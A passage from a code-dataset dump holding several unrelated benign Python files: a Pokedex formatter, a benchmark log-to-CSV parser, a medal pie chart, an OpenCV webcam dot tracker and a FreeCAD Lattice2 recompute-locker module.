abilitySplit = abilityRaw.split(\"/\")\n\n try:\n return {\"ability1\": abilitySplit[0], \"ability2\": abilitySplit[1], \"ability3\": hidability}\n except IndexError:\n return {\"ability1\": abilityRaw, \"ability2\": None, \"ability3\": hidability}\n\ndef formatNavButtons(id):\n prevPoke = Pokedex.query.filter_by(id=id-1).first()\n nextPoke = Pokedex.query.filter_by(id=id+1).first()\n\n if prevPoke == None:\n prevPoke = Pokedex.query.filter_by(id=251).first()\n if nextPoke == None:\n nextPoke = Pokedex.query.filter_by(id=1).first()\n\n return {\"prev\": prevPoke.name, \"next\": nextPoke.name}\n\ndef formatEvoButtons(evoLine):\n print(evoLine)\n evoButtons = {}\n\n if evoLine is None:\n return None, False\n\n i = 0\n multiEvoCheck = False\n for e in evoLine.split(\"/\"):\n multiEvo = e.split(\":\")\n if len(multiEvo) > 1:\n multiEvoList = []\n for m in multiEvo:\n multiEvoList.append(m)\n evoButtons.update({\"evo\"+str(i):multiEvoList})\n multiEvoCheck = i\n else:\n evoButtons.update({\"evo\"+str(i):e})\n\n i += 1\n\n print(evoButtons)\n return evoButtons, multiEvoCheck\n\ndef formatMegaEvoButtons(megaEvo):\n if not megaEvo:\n return None\n\n try:\n return {\"evo1\": megaEvo[0].name, \"evo2\": megaEvo[1].name}\n except IndexError:\n return {\"evo1\": megaEvo[0].name}\n except TypeError:\n return {\"evo1\": megaEvo.name}\n\ndef formatMegaEvoEntry(pokemon, mega):\n return {\n \"id\": pokemon.id,\n \"name\": \"Mega \" + mega.name,\n \"species\": pokemon.species,\n \"poketype\": mega.type,\n \"ability\": mega.ability,\n \"evoline\": pokemon.evoline,\n \"mega\": True,\n \"image\": mega.image,\n \"descrip\": pokemon.descrip,\n \"hp\": mega.hp,\n \"attack\": mega.attack,\n \"defense\": mega.defense,\n \"sattack\": mega.sattack,\n \"sdefense\": mega.sdefense,\n \"speed\": mega.speed,\n \"stone\": mega.stone\n }","repo_name":"superfly310/NSDPokedex","sub_path":"app/DataFormatClasses.py","file_name":"DataFormatClasses.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 
+{"seq_id":"16737767410","text":"from util import *\nimport pandas as pd\n\n\ndef standardize_time(t):\n if t.endswith(\"ms\"):\n return float(t[:-2]) / 1000\n if t.endswith(\"µs\"):\n return float(t[:-2]) / (1000 * 1000)\n else:\n return float(t[:-1])\n\n\ndef parse_time_memory(tm):\n seconds = float(tm.split()[0])\n memory = float(tm.split()[2]) / 1000000\n return seconds, memory\n\n\ndef clean_data(data):\n merged_data = {}\n all_keys = []\n for d in data:\n for k in d.keys():\n if k not in all_keys:\n all_keys.append(k)\n\n for k in all_keys:\n for d in data:\n if k not in merged_data:\n merged_data[k] = []\n if k in d:\n merged_data[k].append(d[k])\n else:\n merged_data[k].append(\"\")\n return merged_data\n\n\ndef get_log_paths(system):\n assert system == \"circ\" or system == \"hycc\"\n test_results_path = \"{}test_results/\".format(CIRC_BENCHMARK_SOURCE)\n circ_paths = [os.path.join(test_results_path, f) for f in os.listdir(\n test_results_path) if f.startswith(system)]\n log_paths = []\n for p in circ_paths:\n if os.path.isdir(p):\n test_dir_path = p\n log_paths += [os.path.join(test_dir_path, f)\n for f in os.listdir(test_dir_path) if f.startswith(\"log\")]\n else:\n # parsing total time\n pass\n return log_paths\n\n\ndef clean_log(log):\n log = log.replace(\"LOG: \", \"\")\n log = log.replace(\"====================================\", \"\")\n log = \"\\n\".join([l for l in log.split(\n \"\\n\") if not l.startswith(\"Benchmarking\") and l])\n return log\n\n\ndef parse_hycc_log(log):\n log = clean_log(log)\n data = {}\n for line in log.split(\"\\n\"):\n line = line.split(\":\")\n\n line[0] = line[0].strip()\n line[1] = line[1].strip()\n\n if line[0] == \"TEST\":\n data[line[0]] = line[1]\n elif line[0] == \"SELECTION_SCHEME\":\n data[line[0]] = line[1]\n elif line[0] == \"MINIMIZATION_TIME\":\n data[line[0]] = int(line[1])\n elif line[0] == \"ARGUMENTS\":\n data[line[0]] = [l for l in line[1].replace(\n \"['\", \" \").replace(\"']\", \" \").replace(\",\", \" \").split() if l]\n elif line[0] == \"COST_MODEL\":\n data[line[0]] = line[1]\n elif line[0] == \"MODE\":\n if line[0] not in data:\n data[line[0]] = []\n data[line[0]].append(line[1])\n elif line[0] == \"RERUN\":\n if line[0] not in data:\n data[line[0]] = []\n data[line[0]].append(int(line[1]))\n elif line[0] == \"Time / Memory\":\n seconds, memory = parse_time_memory(line[1])\n if \"Total_time\" not in data:\n data[\"Total_time\"] = []\n if \"Total_memory\" not in data:\n data[\"Total_memory\"] = []\n data[\"Total_time\"].append(seconds)\n data[\"Total_memory\"].append(memory)\n elif line[0].endswith(\"time\"):\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Total number of gates\":\n data[line[0]] = int(line[1])\n elif line[0] == \"Total depth\":\n data[line[0]] = int(line[1])\n elif \"Timing\" in line[0]:\n key = line[0].split()[1] + \" Time\"\n data[key] = standardize_time(line[1])\n elif line[0] == \"Missing\":\n data[\"MISSING\"] = \"missing\"\n elif \"Error\" in line[0]:\n if \"ERROR\" not in data:\n data[\"ERROR\"] = []\n data[\"ERROR\"].append(\" \".join(line[1:]))\n elif \"Failed\" in line[0]:\n if \"FAIL\" not in data:\n data[\"FAIL\"] = []\n data[\"FAIL\"].append(\" \".join(line[1:]))\n else:\n print(line)\n raise RuntimeError(\"Unknown key\")\n return data\n\n\ndef parse_circ_log(log):\n log = clean_log(log)\n data = {}\n for line in log.split(\"\\n\"):\n line = line.split(\":\")\n assert(len(line) == 2)\n\n line[0] = line[0].strip()\n line[1] = line[1].strip()\n\n if line[0] == \"TEST\":\n 
data[line[0]] = line[1]\n elif line[0] == \"SELECTION_SCHEME\":\n data[line[0]] = line[1]\n elif line[0] == \"PARTITION_SIZE\":\n data[line[0]] = line[1]\n elif line[0] == \"MUTATION_LEVEL\":\n data[line[0]] = line[1]\n elif line[0] == \"MUTATION_STEP_SIZE\":\n data[line[0]] = line[1]\n elif line[0] == \"GRAPH_TYPE\":\n data[line[0]] = \"KaHIP\" if line[1].strip() == \"0\" else \"KaHyPar\"\n elif line[0] == \"COST_MODEL\":\n data[line[0]] = line[1]\n elif line[0] == \"Number of Partitions\":\n data[\"NUM_PARTS\"] = line[1]\n elif line[0] == \"MODE\":\n continue\n elif line[0] == \"RERUN\":\n if line[0] not in data:\n data[line[0]] = []\n data[line[0]].append(int(line[1]))\n elif line[0] == \"Frontend\":\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Optimizations\":\n data[line[0]] = standardize_time(line[1])\n elif \"Assignment\" in line[0]:\n if line[0] == \"Assignment cost of partition\":\n # cost per partition ilp\n if \"assignment_cost\" not in data:\n data[\"assignment_cost\"] = []\n data[\"assignment_cost\"].append(float(line[1]))\n elif line[0] == \"Assignment time\":\n # total solving time \n data[\"assignment_time\"] = standardize_time(line[1])\n else:\n raise RuntimeError(\"Assignment mismatch: {}\".format(line[0]))\n elif line[0] == \"Time / Memory\":\n # requires phase\n seconds, memory = parse_time_memory(line[1])\n if \"Total_time\" not in data:\n data[\"Total_time\"] = []\n if \"Total_memory\" not in data:\n data[\"Total_memory\"] = []\n data[\"Total_time\"].append(seconds)\n data[\"Total_memory\"].append(memory)\n elif line[0] == \"Lowering\":\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Compile\":\n data[line[0]] = standardize_time(line[1])\n elif line[0].endswith(\"time\"):\n data[line[0]] = standardize_time(line[1])\n elif line[0] == \"Total number of gates\":\n data[line[0]] = int(line[1])\n elif line[0] == \"Total depth\":\n data[line[0]] = int(line[1])\n elif \"Timing\" in line[0]:\n key = line[0].split()[1] + \" Time\"\n data[key] = standardize_time(line[1])\n else:\n raise RuntimeError(\"Unknown key: {}\".format(line[0]))\n\n return data\n\n\ndef write_csv(df, log_path):\n header = \"{}csvs/\".format(CIRC_BENCHMARK_SOURCE)\n log_path = log_path.split(\"/\")\n dir_path = os.path.join(header, log_path[-2])\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n version = log_path[-1].split(\".\")[0]+\".csv\"\n csv_path = os.path.join(dir_path, version)\n print(csv_path)\n df.to_csv(csv_path)\n\ndef clean_data(data):\n merged_data = {}\n all_keys = []\n for d in data:\n for k in d.keys():\n if k not in all_keys:\n all_keys.append(k)\n\n for k in all_keys:\n for d in data:\n if k not in merged_data:\n merged_data[k] = []\n if k in d:\n merged_data[k].append(d[k])\n else:\n merged_data[k].append(\"\")\n return merged_data\n\n\ndef parse_hycc_logs():\n log_paths = get_log_paths(\"hycc\")\n compile_datas = []\n run_datas = []\n for log_path in log_paths:\n data = {}\n with open(log_path, \"r\") as f:\n log = f.read()\n data = parse_hycc_log(log)\n if \"log_compile\" in log_path:\n compile_datas.append(data)\n else:\n run_datas.append(data)\n\n # clean compile data\n compile_data = clean_data(compile_datas)\n\n # write compile data\n compile_path = CIRC_BENCHMARK_SOURCE + \"csvs/hycc/compile_data.txt\"\n write_csv(pd.DataFrame(compile_data), compile_path)\n\n # clean run data\n run_data = clean_data(run_datas)\n\n # clean run_path\n run_path = CIRC_BENCHMARK_SOURCE + \"csvs/hycc/run_data.txt\"\n write_csv(pd.DataFrame(run_data), 
run_path)\n \n\ndef parse_circ_logs():\n    log_paths = get_log_paths(\"circ\")\n    compile_datas = []\n    run_datas = []\n    for log_path in log_paths:\n        data = {}\n        with open(log_path, \"r\") as f:\n            log = f.read()\n        data = parse_circ_log(log)\n\n        if \"log_compile\" in log_path:\n            compile_datas.append(data)\n        else:\n            run_datas.append(data)\n\n    # clean compile data\n    compile_data = clean_data(compile_datas)\n\n    # write compile data\n    compile_path = CIRC_BENCHMARK_SOURCE + \"csvs/circ/compile_data.txt\"\n    write_csv(pd.DataFrame(compile_data), compile_path)\n\n    # clean run data\n    run_data = clean_data(run_datas)\n\n    # write run data\n    run_path = CIRC_BENCHMARK_SOURCE + \"csvs/circ/run_data.txt\"\n    write_csv(pd.DataFrame(run_data), run_path)\n","repo_name":"edwjchen/circ_benchmarks","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":9269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36906844031","text":"# number of men with medals: 386\n# number of women with medals: 239\n\nimport matplotlib.pyplot as plt\n\nvalues = [386, 239]\nlabels = [\"Men\", \"Women\"]\ncolors = [\"silver\", \"gold\"]\nexplode = [0, 0.1]\n\nplt.pie(values, labels=labels, colors=colors, explode=explode)\nplt.show()","repo_name":"shirinhk/dataviz","sub_path":"data/piechart.py","file_name":"piechart.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"517505725","text":"import cv2\nimport numpy as np\n\nhue = 0\nsat = 0\nval = 0\n\nhueVar = 0\nsatVar = 0\nvalVar = 0\n\ndef readColorSettings():\n    global hue,sat,val,hueVar,satVar,valVar\n    import colorSettings\n    settings = colorSettings.colorSettings()\n    hue,sat,val = settings[\"hue\"],settings[\"sat\"],settings[\"val\"]\n    hueVar,satVar,valVar = settings[\"hueVar\"],settings[\"satVar\"],settings[\"valVar\"]\n\ndef writeColorSettings():\n    import os\n    settingsFile = \"def colorSettings(): \\n return {\"\n    settingsFile = settingsFile + f\"'hue':{hue}, \\n 'sat':{sat}, \\n 'val':{val}, \\n 'hueVar':{hueVar}, \\n 'satVar':{satVar}, \\n 'valVar':{valVar}\" + \"}\"\n\n    f = open(\"colorSettings.py\",\"w\")\n    f.write(settingsFile)\n    f.close()\n\nreadColorSettings()\n\ndef extractMass(img,lower=False):\n    (contours, hierarchy) = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    areas = []\n\n    for j in range(0,len(contours)):\n        area = cv2.contourArea(contours[j])\n        moments = cv2.moments(contours[j])\n        if moments[\"m00\"] > 0:\n            x = moments[\"m10\"]/moments[\"m00\"]\n            y = moments[\"m01\"]/moments[\"m00\"]\n            position = (round(x),round(y))\n            areas.append({'area':area, 'position':position})\n    \n    def ar(x):\n        return x['area']\n    def pos(x):\n        return x['position'][1]\n    \n    areas.sort(key=ar,reverse=True)\n    if (lower):\n        areas.sort(key=pos,reverse=True)\n\n    if len(areas) > 0:\n        return areas[0][\"position\"]\n    \n    return (-100,-100)\n\ndef changeHue(x):\n    global hue\n    hue = x\n\ndef changeSat(x):\n    global sat\n    sat = x\n\ndef changeVal(x):\n    global val\n    val = x\n\ndef changeHueVar(x):\n    global hueVar\n    hueVar = x\n\ndef changeSatVar(x):\n    global satVar\n    satVar = x\n\ndef changeValVar(x):\n    global valVar\n    valVar = x\n\ndef adjustCenterPoint():\n    topWebcam = cv2.VideoCapture(2)\n    bottomWebcam = cv2.VideoCapture(0)\n    cv2.imshow(\"blueDots\",np.zeros((10,10)))\n    cv2.createTrackbar('Hue','blueDots',hue,255,changeHue)\n    
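# each trackbar writes back to one of the global HSV threshold values via its change* callback\n    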
cv2.createTrackbar('Sat','blueDots',sat,255,changeSat)\n cv2.createTrackbar('Val','blueDots',val,255,changeVal)\n cv2.createTrackbar('Hue-Variance','blueDots',hueVar,255,changeHueVar)\n cv2.createTrackbar('Sat-Variance','blueDots',satVar,255,changeSatVar)\n cv2.createTrackbar('Val-Variance','blueDots',valVar,255,changeValVar)\n\n while True:\n isTrue,topFrame = topWebcam.read()\n isTrue,bottomFrame = bottomWebcam.read()\n \n rubbish,heightCenter = findDotCenter(bottomFrame,testing=True,lower=True)\n editedFrame,center = findDotCenter(topFrame,testing=True)\n\n cv2.imshow(\"BottomFrame\",rubbish)\n \n\n print(\"Adjusting:\",center,heightCenter)\n\n key = cv2.waitKey(1)\n if key == ord('q') or key == 27:\n break\n\n writeColorSettings()\n\n topWebcam.release()\n bottomWebcam.release()\n\n cv2.destroyAllWindows()\n\n return center,heightCenter\n\ndef findDotCenter(img,testing=False,lower=False):\n \n # Konvertiere Kamera-Feed in HSV-Format\n imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n # Extrahiere den gesuchten Punkt aus dem Bild\n blueDots = cv2.inRange(imgHSV, (hue-hueVar,sat-satVar,val-valVar),(hue+hueVar,sat+satVar,val+valVar))\n\n if testing:\n cv2.imshow(\"blueDots\",blueDots)\n \n center = extractMass(blueDots,lower)\n\n # Center an der richtigen Stelle\n cv2.circle(img,center,6,(200,200,0),thickness=-1)\n\n # Generiere überdeckenden Kreis in Hautfarbe\n innerRadius = 7\n outerRadius = 9\n\n mask = np.zeros(img.shape,'uint8')\n mask = cv2.cvtColor(mask,cv2.COLOR_RGB2GRAY)\n cv2.circle(mask,center,outerRadius,255,thickness=-1)\n cv2.circle(mask,center,innerRadius,0,thickness=-1)\n\n skinColor = cv2.mean(img,mask)\n cv2.circle(img,center,int(innerRadius*0.5+outerRadius*0.5),skinColor,-1)\n if testing:\n cv2.imshow(\"Without dot\",img)\n\n return img,center\n\n\nif __name__ == '__main__':\n adjustCenterPoint()\n\n \n \n\n","repo_name":"Nico-Enghardt/PointRecognition","sub_path":"findDot.py","file_name":"findDot.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15163057396","text":"__title__=\"Lattice Recompute Locker: hack to manual recompute of documents.\"\n__author__ = \"DeepSOIC\"\n__url__ = \"\"\n\nimport FreeCAD as App\n\nfrom lattice2Common import *\nimport lattice2Executer as LE\n\ndef touch(obj):\n '''some bastard object like Fusion ignore calls to touch() method. 
This should work around that problem.'''\n    obj.touch()\n    if hasattr(obj,\"Proxy\"):\n        #fixes mystery crash when touching recomputeLocker when it's locked\n        return\n    \n    # the workaround is to reassign some properties...\n    for propname in obj.PropertiesList:\n        typ = obj.getTypeIdOfProperty(propname)\n        val = getattr(obj,propname)\n        if typ == 'App::PropertyLink': \n            setattr(obj,propname,val)\n        elif typ == 'App::PropertyLinkSub': \n            #val is (feature,[\"Edge1\",\"Face2\"])\n            setattr(obj,propname,val)\n        elif typ == 'App::PropertyLinkList':\n            setattr(obj,propname,val)\n        #elif typ == 'App::PropertyLinkSubList': #disabled due to FreeCAD bug #2602\n        #    setattr(obj,propname,val)\n\ndef touchEverything(doc):\n    touch_count = 0\n    for obj in doc.Objects:\n        try:\n            touch(obj)\n            touch_count += 1\n        except:\n            App.Console.PrintError('Failed to touch object {objname}\\n'\n                .format(objname= obj.Name) )\n    if touch_count == 0:\n        raise ValueError(\"forceRecompute: failed to touch any object!\")\n\ndef recomputeFeature(featureToRecompute, bUndoable = True):\n    doc = featureToRecompute.Document\n    if bUndoable:\n        doc.openTransaction(\"Recompute \"+featureToRecompute.Name)\n    if hasattr(featureToRecompute, 'Recomputing'):\n        if featureToRecompute.Recomputing == 'Disabled': #toposeries, paraseries...\n            featureToRecompute.Recomputing = 'Recompute Once'\n    if hasattr(featureToRecompute, \"recompute\"):\n        # new FreeCAD! yay!\n        featureToRecompute.recompute()\n    elif hasattr(featureToRecompute, \"Proxy\"):\n        #Python feature - easy!\n        featureToRecompute.Proxy.execute(featureToRecompute)\n    else:\n        infoMessage(\"RecomputeFeature\",\"Selected feature is a C++ feature. Recomputing them with this command was temporarily disabled, because it is known to break dependencies. The command will be frozen until a reliable way of recomputing C++ features gets exposed.\")\n        return\n    featureToRecompute.purgeTouched()\n    for docobj in featureToRecompute.InList:\n        touch(docobj)\n    if bUndoable:\n        doc.commitTransaction()\n\ndef makeRecomputeLocker(name):\n    '''makeRecomputeLocker(name): makes a RecomputeLocker document object.'''\n    obj = FreeCAD.ActiveDocument.addObject(\"App::FeaturePython\",name)\n    LatticeRecomputeLocker(obj)\n    if FreeCAD.GuiUp: \n        ViewProviderLatticeRecomputeLocker(obj.ViewObject)\n    return obj\n\nclass LatticeRecomputeLocker:\n    \"The LatticeRecomputeLocker object. 
Mainly used as a means to stop FreeCAD's automatic recomputes.\"\n    def __init__(self,obj):\n        self.Type = \"LatticeRecomputeLocker\"\n        \n        obj.addProperty(\"App::PropertyLink\",\"LinkToSelf\",\"Lattice RecomputeLocker\",\"Link to self, that breaks the DAG, which causes standard FreeCAD recomputes to fail.\")\n        \n        obj.addProperty(\"App::PropertyBool\",\"LockRecomputes\",\"Lattice RecomputeLocker\", \"Set to true to disable automatic recomputes in FreeCAD\")\n        \n        obj.Proxy = self\n        \n    def onChanged(self, obj, prop): #prop is a string - name of the property\n        if prop == \"LockRecomputes\":\n            if obj.LockRecomputes:\n                obj.LinkToSelf = obj\n            else:\n                obj.LinkToSelf = None\n    \n    def execute(self, obj):\n        pass\n    \n    def RecomputeDocument(self, obj, bUndoable = True):\n        oldState = obj.LockRecomputes\n        obj.LockRecomputes = False\n        doc = obj.Document\n        if bUndoable:\n            doc.openTransaction(\"Recompute document\")\n        doc.recompute()\n        if bUndoable:\n            doc.commitTransaction()\n        obj.LockRecomputes = oldState\n    \n    def collectTouchedDict(self, selfobj):\n        doc = selfobj.Document\n        dict = {}\n        for docobj in doc.Objects:\n            dict[docobj.Name] = 'Touched' in docobj.State\n        return dict\n    \n    def restoreTouched(self, selfobj, dict):\n        doc = selfobj.Document\n        for docobj in doc.Objects:\n            if dict[docobj.Name] != ('Touched' in docobj.State):\n                if dict[docobj.Name] == True:\n                    touch(docobj)\n                else:\n                    docobj.purgeTouched()\n    \n    \nclass ViewProviderLatticeRecomputeLocker:\n    \"A View Provider for LatticeRecomputeLocker object\"\n\n    def __init__(self,vobj):\n        vobj.Proxy = self\n    \n    def getIcon(self):\n        if self.Object.LockRecomputes:\n            return getIconPath(\"Lattice2_RecomputeLocker_Locked.svg\")\n        else:\n            return getIconPath(\"Lattice2_RecomputeLocker_Unlocked.svg\")\n\n    def attach(self, vobj):\n        self.ViewObject = vobj\n        self.Object = vobj.Object\n\n    \n    def setEdit(self,vobj,mode):\n        return False\n    \n    def unsetEdit(self,vobj,mode):\n        return\n\n    def __getstate__(self):\n        return None\n\n    def __setstate__(self,state):\n        return None\n\n# --------------------------------/document object------------------------------\n\n\n\n# --------------------------------Gui commands----------------------------------\n\ndef getLocker():\n    if hasattr(App.ActiveDocument,\"LatticeRecomputeLocker\"):\n        return App.ActiveDocument.LatticeRecomputeLocker\n    else:\n        return None\n\nclass _CommandMakeLockerObj:\n    \"Command to create RecomputeLocker feature\"\n    def GetResources(self):\n        return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_MakeFeature.svg\"),\n                'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Make recompute locker object\"),\n                'Accel': \"\",\n                'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Make recompute locker object. Doing this is necessary to enable recompute locking hacktionality.\"),\n                'CmdType':\"ForEdit\"}\n        \n    def Activated(self):\n        if getLocker() is None:\n            FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n            FreeCADGui.doCommand(\"lattice2RecomputeLocker.makeRecomputeLocker('LatticeRecomputeLocker')\")\n            FreeCADGui.doCommand(\"App.ActiveDocument.LatticeRecomputeLocker.purgeTouched()\")\n        else:\n            mb = QtGui.QMessageBox()\n            mb.setIcon(mb.Icon.Warning)\n            mb.setText(translate(\"Lattice2_RecomputeLocker\", \"A recompute locker object already exists in this document. 
Only one such object can be made.\", None))\n mb.setWindowTitle(translate(\"Lattice2_RecomputeLocker\",\"Nothing to do\", None))\n mb.exec_()\n \n def IsActive(self):\n if not App.ActiveDocument: return False\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n return False # new FreeCAD, with proper recompute disablement. Disable the hack.\n else:\n return (bool(App.ActiveDocument) and getLocker() is None)\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_MakeFeature', _CommandMakeLockerObj())\n\nclass _CommandLockRecomputes:\n \"Command to lock automatic recomputes\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_LockRecomputes.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Lock recomputes\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Lock recomputes: prevent FreeCAD's automatic recomputes.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n FreeCADGui.doCommand(\"App.ActiveDocument.RecomputesFrozen = True\")\n elif getLocker() is not None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().LockRecomputes = True\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().touch()\") #gets rid of the tick, plus updates the icon.\n else:\n mb = QtGui.QMessageBox()\n mb.setIcon(mb.Icon.Warning)\n mb.setText(translate(\"Lattice2_RecomputeLocker\", \"There is no recompute locker object in the document. Please create one, first.\", None))\n mb.setWindowTitle(translate(\"Lattice2_RecomputeLocker\",\"fail\", None))\n mb.exec_()\n \n def IsActive(self):\n if not App.ActiveDocument: return False\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n return App.ActiveDocument.RecomputesFrozen == False \n else:\n return getLocker() is not None and not getLocker().LockRecomputes\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_LockRecomputes', _CommandLockRecomputes())\n\nclass _CommandUnlockRecomputes:\n \"Command to unlock automatic recomputes\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_UnlockRecomputes.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Unlock recomputes\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Unlock recomputes: switch on FreeCAD's automatic recomputes.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n FreeCADGui.doCommand(\"App.ActiveDocument.RecomputesFrozen = False\")\n elif getLocker() is not None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().LockRecomputes = False\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().purgeTouched()\") #gets rid of the tick, plus updates the icon.\n else:\n mb = QtGui.QMessageBox()\n mb.setIcon(mb.Icon.Warning)\n mb.setText(translate(\"Lattice2_RecomputeLocker\", \"There is no recompute locker object in the document. 
Please create one, first.\", None))\n mb.setWindowTitle(translate(\"Lattice2_RecomputeLocker\",\"fail\", None))\n mb.exec_()\n \n def IsActive(self):\n if not App.ActiveDocument: return False\n if hasattr(App.ActiveDocument,'RecomputesFrozen'):\n return App.ActiveDocument.RecomputesFrozen == True \n else:\n return getLocker() is not None and getLocker().LockRecomputes\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_UnlockRecomputes', _CommandUnlockRecomputes())\n\nclass _CommandRecomputeFeature:\n \"Command to recompute single object\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_RecomputeFeature.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Recompute feature\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"RecomputeFeature: recompute selected objects.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n sel = FreeCADGui.Selection.getSelectionEx()\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n for selobj in sel:\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.recomputeFeature(App.ActiveDocument.\"+selobj.ObjectName+\")\")\n \n def IsActive(self):\n return len(FreeCADGui.Selection.getSelectionEx()) > 0\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_RecomputeFeature', _CommandRecomputeFeature())\n\n\nclass _CommandRecomputeDocument:\n \"Command to recompute whole document\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_RecomputeDocument.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Recompute document\"),\n 'Accel': \"\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Recompute document: recompute the document, ignoring that recomputes are locked.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n try:\n if hasattr(App.ActiveDocument, 'RecomputesFrozen'):\n FreeCADGui.doCommand(\n '_lock = App.ActiveDocument.RecomputesFrozen\\n'\n 'App.ActiveDocument.RecomputesFrozen = False\\n'\n 'App.ActiveDocument.recompute()\\n'\n 'App.ActiveDocument.RecomputesFrozen = _lock\\n'\n 'del _lock\\n'\n )\n else: #old FC, hacky recompute control\n if getLocker() is not None:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.getLocker().Proxy.RecomputeDocument(lattice2RecomputeLocker.getLocker())\")\n else:\n FreeCADGui.doCommand(\"App.ActiveDocument.recompute()\")\n except Exception as err:\n msgError(err)\n \n def IsActive(self):\n return App.ActiveDocument is not None\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_RecomputeDocument', _CommandRecomputeDocument())\n\nclass _CommandForceRecompute:\n \"Command to force recompute of every feature\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_ForceRecompute.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Force recompute\"),\n 'Accel': \"Shift+F5\",\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Force recompute: recompute all features in the document.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n try:\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n FreeCADGui.doCommand(\"lattice2RecomputeLocker.touchEverything(App.ActiveDocument)\")\n _CommandRecomputeDocument().Activated()\n except Exception as err:\n msgError(err)\n \n def IsActive(self):\n return App.ActiveDocument is not None\n \nif FreeCAD.GuiUp:\n 
FreeCADGui.addCommand('Lattice2_RecomputeLocker_ForceRecompute', _CommandForceRecompute())\n\n\nclass _CommandTouch:\n \"Command to touch a feature\"\n def GetResources(self):\n return {'Pixmap' : getIconPath(\"Lattice2_RecomputeLocker_Touch.svg\"),\n 'MenuText': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Touch selected features\"),\n 'ToolTip': QtCore.QT_TRANSLATE_NOOP(\"Lattice2_RecomputeLocker\",\"Touch selected features: mark selected features as needing recomputing.\"),\n 'CmdType':\"ForEdit\"}\n \n def Activated(self):\n FreeCADGui.addModule(\"lattice2RecomputeLocker\")\n try:\n sel = FreeCADGui.Selection.getSelectionEx()\n if len(sel) == 0:\n infoMessage(\"Touch command\",\n \"'Touch selected features' command. Touches selected objects. 'Touched' means the object was changed and should be recomputed; if nothing is touched, recomputing the document does nothing.\\n\\n\"\n \"Please select objects to be marked as touched first, then invoke this command. If all selected objects are touched already, the 'Touched' state is undone (purged).\")\n return\n n_touched = 0\n for so in sel:\n if 'Touched' in so.Object.State:\n n_touched += 1\n if n_touched < len(sel):\n # not all selected objects are currently touched. Touch the remaining...\n FreeCADGui.doCommand(\"for so in Gui.Selection.getSelectionEx(): 